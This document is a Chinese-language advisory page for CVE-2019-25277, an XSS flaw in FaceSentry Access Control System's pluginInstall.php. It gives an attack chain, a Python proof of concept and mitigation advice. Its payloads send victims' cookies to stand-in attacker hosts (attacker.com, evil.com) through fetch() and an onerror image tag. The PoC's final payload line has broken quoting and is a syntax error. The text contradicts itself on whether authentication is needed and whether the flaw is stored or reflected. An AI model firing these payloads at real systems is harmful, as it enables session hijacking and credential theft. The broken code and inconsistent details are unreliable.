CVE-2019-25277 FaceSentry Access Control System跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2019-25277

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

FaceSentry Access Control System

漏洞概述

CVE-2019-25277是FaceSentry Access Control System 6.4.8版本中发现的一个跨站脚本（XSS）漏洞。该漏洞存在于web界面的pluginInstall.php文件中，具体位于'msg'参数。攻击者可以利用此漏洞向应用程序注入恶意JavaScript代码。当受害者访问包含恶意脚本的页面时，这些脚本将在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重安全后果。由于该漏洞不需要认证即可利用，且影响访问控制系统的管理界面，因此对系统安全性构成显著威胁。攻击者可通过构造特定的URL或请求，在用户不知情的情况下获取其认证凭证或执行未经授权的操作。FaceSentry作为企业级门禁控制系统，处理敏感的门禁数据和用户信息，该XSS漏洞可能被用于进一步的内网渗透或数据窃取攻击。

技术细节

该漏洞为存储型或反射型XSS，取决于msg参数的处理方式。攻击者通过构造包含恶意JavaScript代码的msg参数值，将其注入到pluginInstall.php页面。应用程序未对用户输入进行充分的输入验证和输出编码，导致恶意脚本被浏览器解析执行。攻击payload示例：<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>。由于pluginInstall.php通常需要管理员权限访问，攻击者可能首先获取低权限账户，然后利用此漏洞提升权限或窃取管理员会话。漏洞影响CVSS向量为AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明通过网络即可发起攻击，无需特殊权限但需要用户交互。攻击者需诱导管理员点击恶意链接或访问特制页面。修复方案应在服务端对所有用户输入进行严格过滤，并在输出时进行HTML实体编码。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统为FaceSentry Access Control System 6.4.8，确认web服务运行并定位pluginInstall.php端点

STEP 2

步骤2: 构造恶意payload

攻击者构造包含恶意JavaScript代码的XSS payload，如<script>alert(document.cookie)</script>或更复杂的窃取cookie脚本

STEP 3

步骤3: 发送恶意请求

通过GET或POST请求将恶意payload作为msg参数值发送到pluginInstall.php，payload被存储或反射到响应页面

STEP 4

步骤4: 诱导受害者访问

攻击者通过钓鱼邮件、社交工程等方式诱导管理员或用户访问包含恶意脚本的URL

STEP 5

步骤5: 脚本执行与数据窃取

受害者浏览器解析响应时执行恶意JavaScript，攻击者获取用户会话cookie、认证凭证或执行其他恶意操作

STEP 6

步骤6: 会话劫持与权限提升

攻击者利用窃取的凭证劫持管理员会话，访问门禁系统管理界面，可能进一步控制门禁权限或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2019-25277 PoC - FaceSentry XSS in pluginInstall.php
# Target: FaceSentry Access Control System 6.4.8
# Vulnerability: XSS in msg parameter of pluginInstall.php

target_url = "http://target.com/pluginInstall.php"

# XSS payload to steal cookies
xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"

# Construct malicious request
params = {
    'msg': xss_payload,
    'install': '1'
}

try:
    response = requests.get(target_url, params=params, timeout=10)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Payload: {xss_payload}")
    if response.status_code == 200:
        print("[+] PoC executed - XSS payload injected")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative payload - cookie theft via image tag
alt_payload = '<img src=x onerror="this.src='https://evil.com/log?c='+document.cookie">'

影响范围

FaceSentry Access Control System 6.4.8

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时措施：1) 通过网络层访问控制限制对web管理界面的访问，仅允许可信IP访问；2) 禁用或限制pluginInstall.php功能的使用；3) 监控HTTP请求中的可疑script标签和事件处理器属性；4) 提醒管理员不要点击来历不明的链接；5) 定期检查服务器日志，查找XSS攻击特征；6) 考虑部署WAF规则临时阻断此类攻击模式。